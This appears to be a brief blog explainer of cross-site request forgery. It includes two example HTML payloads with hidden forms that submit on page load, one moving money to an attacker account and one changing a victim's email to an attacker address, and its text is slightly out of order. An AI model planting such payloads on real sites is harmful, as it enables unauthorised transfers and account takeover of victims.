What is cross-site request forgery?

Cross-site request forgery (CSRF) is a web vulnerability that lets a malicious hacker trick the victim into submitting a request that allows the attacker to perform state-changing actions on behalf of the victim. Cross-site request forgery is also called XSRF, sea surf, session riding, or one-click attack.

<body onload="document.csrf.submit()">
<form action="http://example.com/bank.php" method="POST" name="csrf">
<input type="hidden" name="action" value="transfer">
<input type="hidden" name="target" value="attacker_account">
</form>

The attacker creates a malicious page http://example.attacker/exploit.html with the following content:

<body onload=document.email.submit()>
<form action="http://example.com/set_email.php" method="post" name="email">
<input type="hidden" id="email" value="attacker@example.attacker">
</form>
</body>

Andrew's Blog

What is cross-site request forgery?